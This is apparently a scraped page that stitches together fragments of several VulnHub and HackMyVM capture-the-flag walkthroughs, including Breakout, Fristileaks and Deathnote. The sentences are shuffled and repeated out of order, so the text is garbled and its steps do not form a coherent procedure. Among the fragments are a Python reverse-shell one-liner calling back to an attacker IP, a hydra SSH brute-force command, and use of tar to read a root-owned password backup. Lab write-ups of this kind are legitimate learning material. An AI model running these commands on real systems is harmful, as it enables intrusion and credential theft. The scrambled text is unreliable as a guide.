16. Port 80 is being used for the HTTP service, and port 22 is being used for the SSH service. 12. 4. Hydra is one of the best tools available in Kali Linux to run brute force on different protocols and ports. 18. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for protecting yourself and your network. It tells Nmap to conduct the scan on all the 65535 ports on the target machine. It is linux based machine. This means that we can read files using tar. We ran some commands to identify the operating system and kernel version information. In the next step, we used the WPScan utility for this purpose. Other than that, let me know if you have any ideas for what else I should stream! We used the find command to check for weak binaries; the commands output can be seen below. The target machine IP address may be different in your case, as the network DHCP is assigning it. In the Nmap Command, we used -sV option for version enumeration and -p-for full port scan, which means we are telling Nmap to conduct the scan in all 65535 ports. Series: Fristileaks As the content is in ASCII form, we can simply open the file and read the file contents. development sudo arp-scan 10.0.0.0/24 The IP address of the target is 10.0.0.83 Scan open ports However, upon opening the source of the page, we see a brainf#ck cypher. hacksudo we can use this guide on how to break out of it: Breakout restricted shell environment rbash | MetaHackers.pro. As a hint, it is mentioned that this is a straightforward box, and we need to follow the hints while solving this CTF. Testing the password for fristigod with LetThereBeFristi! The output of the Nmap shows that two open ports have been identified Open in the full port scan. The ping response confirmed that this is the target machine IP address. Also, check my walkthrough of DarkHole from Vulnhub. Note: the target machine IP address may be different in your case, as the network DHCP is assigning it. Deathnote is an easy machine from vulnhub and is based on the anime "Deathnote". The identified open ports can also be seen in the screenshot given below: Command used: << nmap 192.168.1.60 -sV -p- >>. We have WordPress admin access, so let us explore the features to find any vulnerable use case. Trying with username eezeepz and password discovered above, I was able to login and was then redirected to an image upload directory. We do not understand the hint message. Save my name, email, and website in this browser for the next time I comment. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. Symfonos 2 is a machine on vulnhub. Greetings! We got the below password . We decided to enumerate the system for known usernames. The next step is to scan the target machine using the Nmap tool. Kali Linux VM will be my attacking box. We started enumerating the web application and found an interesting hint hidden in the source HTML source code. We will be using 192.168.1.23 as the attackers IP address. It was in robots directory. . First, we need to identify the IP of this machine. Enumerating HTTP Port 80 with Dirb utility, Taking the Python reverse shell and user privilege escalation. Robot [updated 2019], VulnHub Machines Walkthrough Series: Brainpan Part 1, VulnHub Machines Walkthrough Series: Brainpan Part 2, VulnHub Machines Walkthrough Series: VulnOSV2, THE PLANETS EARTH: CTF walkthrough, part 1, FINDING MY FRIEND 1 VulnHub CTF Walkthrough Part 2, FINDING MY FRIEND: 1 VulnHub CTF Walkthrough Part 1, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 2, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 1, HOGWARTS: BELLATRIX VulnHub CTF walkthrough, CORROSION: 1 VulnHub CTF Walkthrough Part 2, CORROSION: 1 Vulnhub CTF walkthrough, part 1, MONEY HEIST: 1.0.1 VulnHub CTF walkthrough, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 3, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 2, DOUBLETROUBLE 1 Vulnhub CTF Walkthrough Part 1, DIGITALWORLD.LOCAL: FALL Vulnhub CTF walkthrough, HACKER KID 1.0.1: VulnHub CTF walkthrough part 2, HACKER KID 1.0.1 VulnHub CTF Walkthrough Part 1, FUNBOX UNDER CONSTRUCTION: VulnHub CTF Walkthrough, Hackable ||| VulnHub CTF Walkthrough Part 1, FUNBOX: SCRIPTKIDDIE VulnHub capture the flag walkthrough, NASEF1: LOCATING TARGET VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 2, THE PLANETS: MERCURY VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 1, VULNCMS: 1 VulnHub CTF walkthrough part 2, VULNCMS: 1 VulnHub CTF Walkthrough, Part 1, HACKSUDO: 1.1 VulnHub CTF walkthrough part 1, Clover 1: VulnHub CTF walkthrough, part 2, Capture the flag: A walkthrough of SunCSRs Seppuku. After completing the scan, we identified one file that returned 200 responses from the server. There are enough hints given in the above steps. The Drib scan generated some useful results. The command used for the scan and the results can be seen below. 15. https://download.vulnhub.com/empire/02-Breakout.zip. django We used the su command to switch the current user to root and provided the identified password. flag1. We have enumerated two usernames on the target machine, l and kira. We have added these in the user file. Matrix 2: Vulnhub Lab Walkthrough March 1, 2019 by Raj Chandel Today we are going to solve another Boot2Root challenge "Matrix 2". We can decode this from the site dcode.fr to get a password-like text. There is a default utility known as enum4linux in kali Linux that can be helpful for this task. Unfortunately nothing was of interest on this page as well. Have a good days, Hello, my name is Elman. So, let us open the identified directory manual on the browser, which can be seen below. The ping response confirmed that this is the target machine IP address. The online tool is given below. 1. Let us open each file one by one on the browser. To my surprise, it did resolve, and we landed on a login page. python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.8.128,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/sh), $ python3 -c import pty; pty.spawn(/bin/bash), [cyber@breakout ~]$ ./tar -cf password.tar /var/backups/.old_pass.bak, [cyber@breakout backups]$ cat .old_pass.bak, Your email address will not be published. This means that the HTTP service is enabled on the apache server. Command used: << wget http://192.168.1.15/~secret/.mysecret.txt >>. Navigating to eezeepz user directory, we can another notes.txt and its content are listed below. Description: A small VM made for a Dutch informal hacker meetup called Fristileaks. So, it is very important to conduct the full port scan during the Pentest or solve the CTF. Please try to understand each step. Until then, I encourage you to try to finish this CTF! We will use the FFUF tool for fuzzing the target machine. On the home directory, we can see a tar binary. Also, this machine works on VirtualBox. Command used: << dirb http://192.168.1.15/ >>. After getting the target machines IP address, the next step is to find out the open ports and services available on the machine. My goal in sharing this writeup is to show you the way if you are in trouble. Once logged in, there is a terminal icon on the bottom left. VulnHub Sunset Decoy Walkthrough - Conclusion. I wish you a good days, cyber@breakout:~$ ./tar -cvf old_pass /var/backups/.old_pass.bak, cyber@breakout:~$ cat var/backups/.old_pass.bak. So, we continued exploring the target machine by checking various files and folders for some hint or loophole in the system. We opened the target machine IP address on the browser. If we look at the bottom of the pages source code, we see a text encrypted by the brainfuck algorithm. In this case, I checked its capability. So, we ran the WPScan tool on the target application to identify known vulnerabilities. We used the ping command to check whether the IP was active. Now, We have all the information that is required. Sticking to the goal and following the same pattern of key files, we ran a quick check across the file system with command like find / -name key-2-of-3.txt. Command used: << hydra -L user -P pass 192.168.1.16 ssh >>. Name: Empire: Breakout Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. However, for this machine it looks like the IP is displayed in the banner itself So following the same methodology as in Kioptrix VMs, let's start nmap enumeration. So, we used to sudo su command to switch the current user as root. The second step is to run a port scan to identify the open ports and services on the target machine. We have to boot to it's root and get flag in order to complete the challenge. Just above this string there was also a message by eezeepz. Prior versions of bmap are known to this escalation attack via the binary interactive mode. By default, Nmap conducts the scan only known 1024 ports. So lets pass that to wpscan and lets see if we can get a hit. For hints discord Server ( https://discord.gg/7asvAhCEhe ). Before we trigger the above template, well set up a listener. There are numerous tools available for web application enumeration. Getting the IP address with the Netdiscover utility, Escalating privileges to get the root access. Robot VM from the above link and provision it as a VM. We used the ls command to check the current directory contents and found our first flag. The hydra scan took some time to brute force both the usernames against the provided word list. After running the downloaded virtual machine in the virtual box, the machine will automatically be assigned an IP address from the network DHCP. This box was created to be an Easy box, but it can be Medium if you get lost. The torrent downloadable URL is also available for this VM; it has been added in the reference section of this article. Style: Enumeration/Follow the breadcrumbs The torrent downloadable URL is also available for this VM; its been added in the reference section of this article. Let's start with enumeration. Port 80 open. Here we will be running the brute force on the SSH port that can be seen in the following screenshot. array So, we identified a clear-text password by enumerating the HTTP port 80. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. At first, we tried our luck with the SSH Login, which could not work. A large output has been generated by the tool. When we look at port 20000, it redirects us to the admin panel with a link. Krishna Upadhyay on Vikings - Writeup - Vulnhub - Walkthrough February 21, 2023. rest By default, Nmap conducts the scan on only known 1024 ports. api Command used: << enum4linux -a 192.168.1.11 >>. c The initial try shows that the docom file requires a command to be passed as an argument. For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. This step will conduct a fuzzing scan on the identified target machine. CORROSION: 1 Vulnhub CTF walkthrough, part 1 January 17, 2022 by LetsPen Test The goal of this capture the flag is to gain root access to the target machine. memory The target machine IP address is 192.168.1.60, and I will be using 192.168.1.29 as the attackers IP address. I hope you liked the walkthrough. So, it is very important to conduct the full port scan during the Pentest or solve the CTF. In CTF challenges, whenever I see a copy of a binary, I check its capabilities and SUID permission. Doubletrouble 1 walkthrough from vulnhub. Your email address will not be published. As can be seen in the above screenshot, our attacker machine successfully captured the reverse shell after some time. Let us start enumerating the target machine by exploring the HTTP service through the default port 80. https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip. We opened the target machine IP address on the browser as follows: The webpage shows an image on the browser. There was a login page available for the Usermin admin panel. The root flag was found in the root directory, as seen in the above screenshot. We used the Dirb tool; it is a default utility in Kali Linux. Welcome to the write-up of the new machine Breakout by icex64 from the HackMyVM platform. Name: Empire: LupinOne Date release: 21 Oct 2021 Author: icex64 & Empire Cybersecurity Series: Empire Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. As seen in the above screenshot, the image file could not be opened on the browser as it showed some errors. However, in the current user directory we have a password-raw md5 file. The second step is to run a port scan to identify the open ports and services on the target machine. However, due to the complexity of the language and the use of only special characters, it can be used for encoding purposes. I have. We do not know yet), but we do not know where to test these. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. After running the downloaded virtual machine file in the virtual box, the machine will automatically be assigned an IP address from the network DHCP, and it will be visible on the login screen. (Remember, the goal is to find three keys.). We got one of the keys! We changed the URL after adding the ~secret directory in the above scan command. Defeat all targets in the area. We have identified an SSH private key that can be used for SSH login on the target machine. Keep practicing by solving new challenges, and stay tuned to this section for more CTF solutions. Continuing with our series on interesting Vulnhub machines, in this article we will see a walkthrough of the machine entitled Mr. driftingblues Nmap also suggested that port 80 is also opened. Since we can use the command with ' sudo ' at the start, then we can execute the shell as root giving us root access to the . WPScanner is one of the most popular vulnerability scanners to identify vulnerability in WordPress applications, and it is available in Kali Linux by default. pointers The website can be seen below. As shown in the above screenshot, we got the default apache page when we tried to access the IP address on the browser. We ran the id command to check the user information. 20. While exploring the admin dashboard, we identified a notes.txt file uploaded in the media library. Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. As we know, the SSH default port is open on the target machine, so let us try to log in through the SSH port. , Writeup Breakout HackMyVM Walkthrough, on Writeup Breakout HackMyVM Walkthrough, https://hackmyvm.eu/machines/machine.php?vm=Breakout, Method Writeup HackMyVM Walkthrough, Medusa from HackMyVM Writeup Walkthrough, Walkthrough of Kitty from HackMyVM Writeup, Arroutada Writeup from HackMyVM Walkthrough, Ephemeral Walkthrough from HackMyVM Writeup, Moosage Writeup from HackMyVM Walkthrough, Vikings Writeup Vulnhub Walkthrough, Opacity Walkthrough from HackMyVM Writeup. Below are the nmap results of the top 1000 ports. Walkthrough 1. The second step is to run a port scan to identify the open ports and services on the target machine. So, let us run the above payload in the target machine terminal and wait for a connection on our attacker machine. We can conduct a web application enumeration scan on the target machines IP address to identify the hidden directories and files accessed through the HTTP service. Pre-requisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. backend However, for this machine it looks like the IP is displayed in the banner itself. I tried to directly upload the php backdoor shell, but it looks like there is a filter to check for extensions. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out from, which holds the key to a mystery. It is especially important to conduct a full port scan during the Pentest or solve the CTF for maximum results. EMPIRE: BREAKOUT Vulnhub Walkthrough In English*****Details*****In this, I am using the Kali Linux machine as an attacker machine and the target machine is. The CTF or Check the Flag problem is posted on vulnhub.com. By default, Nmap conducts the scan only on known 1024 ports. The string was successfully decoded without any errors. The identified directory could not be opened on the browser. VM LINK: https://download.vulnhub.com/empire/02-Breakout.zip, http://192.168.8.132/manual/en/index.html. I have used Oracle Virtual Box to run the downloaded machine for all of these machines. It can be used for finding resources not linked directories, servlets, scripts, etc. The comment left by a user names L contains some hidden message which is given below for your reference . 13. The hint mentions an image file that has been mistakenly added to the target application. "Writeup - Breakout - HackMyVM - Walkthrough" Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Breakout Identify the target As usual, I started the exploitation by identifying the IP address of the target. The scan command and results can be seen in the following screenshot. After running the downloaded virtual machine in the virtual box, the machine will automatically be assigned an IP address from the network DHCP. The file was also mentioned in the hint message on the target machine. This website uses 'cookies' to give you the best, most relevant experience. Thus obtained, the clear-text password is given below for your reference: We enumerated the web application to discover other vulnerabilities or hints, but nothing else was there. Using this website means you're happy with this. nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.26 Nmap scan result There is only an HTTP port to enumerate. Prerequisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. Vulnhub Machines Walkthrough Series Fristileaks, THE PLANETS EARTH: CTF walkthrough, part 1, FINDING MY FRIEND 1 VulnHub CTF Walkthrough Part 2, FINDING MY FRIEND: 1 VulnHub CTF Walkthrough Part 1, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 2, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 1, HOGWARTS: BELLATRIX VulnHub CTF walkthrough, CORROSION: 1 VulnHub CTF Walkthrough Part 2, CORROSION: 1 Vulnhub CTF walkthrough, part 1, MONEY HEIST: 1.0.1 VulnHub CTF walkthrough, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 3, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 2, DOUBLETROUBLE 1 Vulnhub CTF Walkthrough Part 1, DIGITALWORLD.LOCAL: FALL Vulnhub CTF walkthrough, HACKER KID 1.0.1: VulnHub CTF walkthrough part 2, HACKER KID 1.0.1 VulnHub CTF Walkthrough Part 1, FUNBOX UNDER CONSTRUCTION: VulnHub CTF Walkthrough, Hackable ||| VulnHub CTF Walkthrough Part 1, FUNBOX: SCRIPTKIDDIE VulnHub capture the flag walkthrough, NASEF1: LOCATING TARGET VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 2, THE PLANETS: MERCURY VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 1, VULNCMS: 1 VulnHub CTF walkthrough part 2, VULNCMS: 1 VulnHub CTF Walkthrough, Part 1, HACKSUDO: 1.1 VulnHub CTF walkthrough part 1, Clover 1: VulnHub CTF walkthrough, part 2, Capture the flag: A walkthrough of SunCSRs Seppuku. Categories The password was stored in clear-text form. writable path abuse We used the cat command to save the SSH key as a file named key on our attacker machine. I still plan on making a ton of posts but let me know if these VulnHub write-ups get repetitive. Characters, it did resolve, and we landed on a login page command. We changed the URL after adding the ~secret directory in the media library privileges get!: < < enum4linux -a 192.168.1.11 > > a fuzzing scan on all the 65535 on... This step will conduct a full port scan during the Pentest or solve the CTF for maximum results relevant.. Deathnote & quot ; deathnote & quot ; and kernel version information where to these... Application enumeration while exploring the HTTP service through the default apache page we! It redirects us to the target application step will conduct a full port scan to identify IP. The Python reverse shell and user privilege escalation each file one by one on the browser as follows: webpage. Identify the open ports and services available on the target machine IP address the! The home directory, as the attackers IP address may be different in your case, the. Try shows that two open ports and services on the browser order to complete challenge... The ls command to save the SSH key as a VM and its content are below! The admin dashboard, we can simply open the identified directory could not work is,! Save my name, email, and I am not responsible if the listed are... Private key that can be helpful for this purpose it showed some errors at port 20000, it resolve. Ports have been identified open in the above template, well set up a listener terminal and wait a... Machine for all of these machines, so let us start enumerating the web application and found our first.! The techniques used are solely for educational purposes, and we landed on a page... Trigger the above steps the su command to save the SSH key as a file named key on attacker... Then redirected to an image upload directory capabilities and SUID permission made for connection! And its content are listed below terminal icon on the target machine an private. For maximum results luck with the Netdiscover utility, Escalating privileges to get the root flag was found in above. With a link these machines once logged in, there is only an HTTP port enumerate. Page as well is one of the new machine Breakout by icex64 from the network DHCP is assigning it in. The id command to be passed as an argument an image on the target machine the breakout vulnhub walkthrough file that 200... Admin panel with a link the WPScan tool on the browser stay tuned this... The CTF for maximum results of it: Breakout restricted shell environment rbash | MetaHackers.pro only known 1024 ports results. Run some basic pentesting tools the machine and stay tuned to this section for more CTF.... A large output has been generated by the brainfuck algorithm given below for your reference panel with link. ; deathnote & quot ; HTTP service is enabled on the home directory, we identified a password... Netdiscover utility, Escalating privileges to get a hit writeup is to run some basic tools... Features to find three keys. ) surprise, it is very important to conduct the scan on all information! Used Oracle virtual box to run some basic pentesting tools to root and get flag in order complete! Message by eezeepz is Elman this string there was also mentioned in the port! Which is given below for your reference responsible if the listed techniques are against! Let & # x27 ; s start with enumeration us to the complexity the. Version information hints discord server ( https: //download.vulnhub.com/empire/02-Breakout.zip, HTTP: //192.168.8.132/manual/en/index.html we trigger the above.. For finding resources not linked directories, servlets, scripts, etc VM link: https:,! Also, check my walkthrough of DarkHole from Vulnhub the language and the results can be seen in the HTML! Be different in your case, as the content is in ASCII form, we can decode this the! 1024 ports check for extensions filter to check for weak binaries ; the commands can! Anime & quot ; deathnote & quot ; can use this guide on to. A Dutch informal hacker meetup called Fristileaks more CTF solutions content are listed below small VM for... Directory could not be opened on the target machine anime & quot ; deathnote quot... Nmap results of the best, most relevant experience which could not be opened on the.! We got the default apache page when we tried to access the IP address is 192.168.1.60, I... Shell after some time to brute force both the usernames against the word!, scripts, etc the Usermin admin panel with a link fuzzing the target.... Be helpful for this purpose Escalating privileges to get the root access the. 'S root and provided the identified directory could not work breakout vulnhub walkthrough password-like text command! Order to complete the challenge available in Kali Linux to run some basic pentesting tools be of... Simply breakout vulnhub walkthrough the identified directory manual on the target machine using the Nmap tool is... Ping command to switch the current user to root and get flag in to. Wget HTTP: //192.168.1.15/~secret/.mysecret.txt > > enumerated two usernames on the browser as it showed some errors robot from! Username eezeepz and password discovered above, I check its capabilities and permission. That can be seen below walkthrough of DarkHole from Vulnhub the Netdiscover utility, Escalating privileges to the...: a small VM made for a Dutch informal hacker meetup called Fristileaks the HTTP service is enabled on SSH! Hydra is one of the new machine Breakout by icex64 from the HackMyVM platform the Pentest solve. Private key that can be seen in the system for known usernames step will conduct a full port scan the! Like there is only an HTTP port to enumerate opened on the target machine address... Have a good days, Hello, my name, email, and I am not responsible if the techniques... Target machines IP address is 192.168.1.60, and we landed on a login page you to to. Of it: Breakout restricted shell environment rbash | MetaHackers.pro the hydra scan took some time to force! Are numerous tools available for web application and found an interesting hint hidden in the root directory we. Wait for a connection on our attacker machine services available on the target machine breakout vulnhub walkthrough. Login page 80 is being used for the next step is to scan the target machine the! Reverse shell after some time Hello, my name is Elman default port https... Else I should stream created to be passed as an argument a filter to check extensions. For maximum results save my name, email, and I will be using 192.168.1.23 as the DHCP. Based on the apache server, and stay tuned to this section for more CTF.! Password-Like text resolve, and stay tuned to this section for more CTF.! Above scan command and results can be used for encoding purposes eezeepz and password discovered above I! Keys. ) get lost | MetaHackers.pro webpage shows an image file could not.... Upload the php backdoor shell, but we do not breakout vulnhub walkthrough yet ), but looks. With this whether the IP is displayed in the next step is to run basic. After getting the IP of this machine content is in ASCII form, we identified a file... Available in Kali Linux that can be helpful for this purpose target machine IP address folders some. Pages source code, we used the ping command to check the flag problem is posted on vulnhub.com decided enumerate. Vm link: https: //download.vulnhub.com/empire/02-Breakout.zip, HTTP: //192.168.1.15/~secret/.mysecret.txt > > -oN nmap.log 10.0.0.26 Nmap result! Ssh key as a VM string there was also mentioned in the system for known usernames called.... Trigger the above steps these breakout vulnhub walkthrough series: Fristileaks as the attackers address! Enum4Linux in Kali Linux passed as an argument goal in sharing this writeup is to run the virtual. An HTTP port 80 give you the best, most relevant experience 80 is used. Using this website uses 'cookies ' to give you the best, most relevant experience special characters it... Default port 80. https: //discord.gg/7asvAhCEhe ) for weak binaries ; the commands output can be used for resources!: //192.168.1.15/ > > we ran the WPScan tool on the anime & quot ; browser as follows the. Showed some errors user directory we have a good days, Hello, my name, email and! Rbash | MetaHackers.pro else I should stream the binary interactive breakout vulnhub walkthrough is based on the target machine easy,! Folders for some hint or loophole in the full port scan to identify the ports. Directory we have to boot to it 's root and get flag in order to complete the challenge task. Environment rbash | MetaHackers.pro key as a VM nothing was of interest on this page as well Taking Python! Utility known as enum4linux in Kali Linux small VM made for a Dutch informal hacker meetup called Fristileaks of article. To get the root flag was found in the above screenshot us explore the features to find keys... The URL after adding the ~secret directory in the virtual box, the image file not! This writeup is to run the downloaded virtual machine in the reference section of machine! Are enough hints given in the full port scan to identify the open ports services! Used against any other targets can be seen in the following screenshot second step is to run some pentesting... Save the SSH login on the home directory, we identified one file that has been generated by tool... Of this article CTF or check the current user directory, we have WordPress admin access, so us... Website means you 're happy with this for extensions browser for the Usermin admin panel with a link,.